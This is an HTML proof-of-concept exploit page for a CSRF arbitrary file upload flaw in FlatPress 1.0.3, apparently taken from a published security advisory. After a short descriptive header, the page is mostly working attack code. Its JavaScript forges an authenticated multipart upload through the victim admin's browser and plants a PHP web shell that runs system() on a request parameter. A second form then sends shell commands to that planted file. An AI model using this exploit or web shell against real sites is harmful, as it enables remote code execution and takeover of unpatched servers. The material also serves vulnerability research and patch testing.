1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 |
<!DOCTYPE html> <!-- FlatPress 1.0.3 CSRF Arbitrary File Upload Vendor: Edoardo Vacchi Product web page: http://www.flatpress.org Affected version: 1.0.3 Summary: FlatPress is a blogging engine that saves your posts as simple text files. Forget about SQL! You just need some PHP. Desc: The vulnerability is caused due to the improper verification of uploaded files via the Uploader script using 'upload[]' POST parameter which allows of arbitrary files being uploaded in '/fp-content/attachs' directory. The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform actions with administrative privileges if a logged-in user visits a malicious web site resulting in execution of arbitrary PHP code by uploading a malicious PHP script file and execute system commands. Tested on: Apache/2.4.10 PHP/5.6.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5328 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5328.php 04.04.2016 --> <html> <title>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC</title> <body> <script type="text/javascript"> function exec(){ var command = document.getElementById("exec"); var url = "http://localhost/flatpress/fp-content/attachs/test.php?cmd="; var cmdexec = command.value; window.open(url+cmdexec,"ZSL_iframe"); } function upload(){ var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/flatpress/admin.php?p=uploader&action=default", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary1Ix0O1LgWmzQa0af"); xhr.withCredentials = true; var body = "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + "Content-Disposition: form-data; name=\"_wpnonce\"\r\n" + "\r\n" + "5a462c73ac\r\n" + "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + "Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" + "\r\n" + "/flatpress/admin.php?p=uploader\r\n" + "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + "Content-Disposition: form-data; name=\"upload[]\"; filename=\"test.php\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\x3c?php\r\n" + "system($_REQUEST[\'cmd\']);\r\n" + "?\x3e\r\n" + "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" + "Content-Disposition: form-data; name=\"upload\"\r\n" + "\r\n" + "Upload\r\n" + "------WebKitFormBoundary1Ix0O1LgWmzQa0af--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <h3>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC Script</h3> <form action="#"> <button type="button" onclick=upload()>Upload test.php file!</button> </form><br /> <form action="javascript:exec()"> <input type="text" id="exec" placeholder="Enter a command"> <input type="submit" value="Execute!"> </form><br /> <iframe style="border:2px;border-style:dashed;color:#d3d3d3" srcdoc="command output frame" width="700" height="600" name="ZSL_iframe"> </iframe> <br /> <font size="2" color="#d3d3d3">ZSL-2016-5328</font> </body> </html> |